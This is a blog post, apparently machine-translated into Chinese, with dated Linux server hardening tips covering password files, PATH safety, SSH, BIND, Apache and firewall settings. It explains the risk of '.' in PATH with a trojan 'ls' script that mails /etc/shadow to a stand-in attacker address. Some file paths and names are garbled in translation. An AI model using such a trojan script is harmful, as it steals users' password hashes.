Linux（服務器）的安全提示（第1部分）

我很久沒有在博客上發布任何內容了，我想與您分享一些（其中包括）一本書中的一些建議。 我在大學裡找到了它，我只是閱讀，雖然說實在有些過時，並且隨著系統的發展，所顯示的技術不太可能起作用，但它們仍然是有趣的方面。

我想澄清一下，這些建議是針對中等或大規模使用的用作服務器的Linux系統的建議，因為在桌面用戶級別，儘管可以應用它們，但它們並不是很有用。

我還注意到，它們只是簡單的快速提示，儘管我計劃針對特定主題撰寫另一篇更具體，更廣泛的文章，但我不會贅述。 但是我稍後會看到。 讓我們開始吧。

密碼政策。 

儘管這聽起來像是一個流行語，但擁有良好的密碼策略可以區分是否存在易受攻擊的系統。 諸如“蠻力”之類的攻擊利用了密碼錯誤的優勢來訪問系統。 最常見的提示是：

• 組合大寫和小寫。
• 使用特殊字符。
• 數字。
• 超過6位數字（希望超過8位）。

除此之外，讓我們考慮兩個基本文件。  / etc / passwd和/ etc / shadow。

非常重要的是該文件 / etc / passwd。 除了給我們用戶的名字，他的uid，文件夾路徑，bash ..等在某些情況下，它還會顯示用戶的加密密鑰。

 讓我們看一下它的典型組成。

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

用戶：cryptkey：uid：gid：path :: path：bash

真正的問題是，此特定文件具有權限 -rw-r – r– 這意味著它具有系統上任何用戶的讀取權限。 而且擁有加密密鑰並不是很難解密真正的密鑰。

這就是文件存在的原因 / etc /陰影。 除其他事項外，這是存儲所有用戶密鑰的文件。 該文件具有必要的權限，因此沒有用戶可以讀取它。

要解決此問題，我們必須轉到文件 / etc / passwd文件 並將加密的密鑰更改為“ x”，這只會將密鑰保存在我們的文件中 / etc /陰影。

desdelinux:x:500:501::/home/usuario1:/bin/bash

PATH和.bashrc等問題。

當用戶在其控制台上執行命令時，外殼程序會在PATH環境變量包含的目錄列表中查找該命令。

如果您在控制台中鍵入“ echo $ PATH”，它將輸出如下內容。

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

這些文件夾中的每一個都是外殼將在其中查找為執行該命令而編寫的命令的位置。 他“。” 這意味著要搜索的第一個文件夾與執行命令的文件夾相同。

假設有一個用戶“ Carlos”，並且該用戶想要“做惡”。 該用戶可以在其主文件夾中保留一個名為“ ls”的文件，並在該文件中執行以下命令：

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

如果目標用戶是root用戶，則嘗試列出carlos文件夾內的文件夾（因為它首先在同一文件夾中查找命令，因此無意中它將把帶有密碼的文件發送到此電子郵件，然後是文件夾將被列出，直到很晚他才發現。

為了避免這種情況，我們必須消除“。” PATH變量。

同樣，應審核/.bashrc、/.bashrc_profile、./.login等文件，並檢查是否沒有“。”。 實際上，您可以在PATH變量中添加類似這樣的文件，然後更改特定命令的目標。

服務提示：

上海

• 在sshd_config文件中禁用ssh協議的版本1。
• 不允許root用戶通過ssh登錄。
• ssh_host_key，ssh_host_dsa_key和ssh_host_rsa_key文件和文件夾只能由root用戶讀取。

BIND

• 更改named.conf文件中的歡迎消息，使其不顯示版本號
• 限制區域傳輸，僅對需要它的團隊啟用。

阿帕奇

• 阻止服務在歡迎消息中顯示您的版本。 編輯httpd.conf文件並添加或修改以下行：  

ServerSignature Off
ServerTokens Prod

• 禁用自動索引
• 將apache配置為不提供敏感文件，例如.htacces，* .inc，* .jsp等。
• 從服務中刪除手冊頁或樣本
• 在受限環境中運行apache

網絡安全。

必須涵蓋從外部網絡到系統的所有可能條目，這是一些重要提示，可防止入侵者從您的網絡掃描並獲取信息。

阻止ICMP流量

必須將防火牆配置為阻止所有類型的傳入和傳出ICMP流量和回顯響應。 這樣，您就可以避免例如在IP範圍內尋找活動設備的掃描儀找到您。 

避免TCP ping掃描。

掃描系統的一種方法是TCP ping掃描。 假設您的服務器上的端口80上有一個Apache服務器。入侵者可以向該端口發送一個ACK請求，如果系統響應，則該計算機將處於活動狀態，並將掃描其餘端口。

為此，您的防火牆應始終具有“狀態感知”選項，並應丟棄所有與已經建立的TCP連接或會話不對應的ACK數據包。

一些其他提示：

• 使用IDS系統來檢測網絡的端口掃描。
• 配置防火牆，使其不信任連接源端口設置。

這是因為某些掃描使用“偽”源端口（例如20或53），因為許多系統信任這些端口，因為它們是ftp或DNS的典型代表。

注意： 請記住，本文中指出的大多數問題已在幾乎所有當前發行版中得到解決。 但是，掌握有關這些問題的關鍵信息永遠不會有任何傷害，這樣您就不會發生它們。

注意： 稍後，我將看到一個特定的主題，並且將發布一個包含更多詳細信息和最新信息的文章。

感謝所有人閱讀。

問候。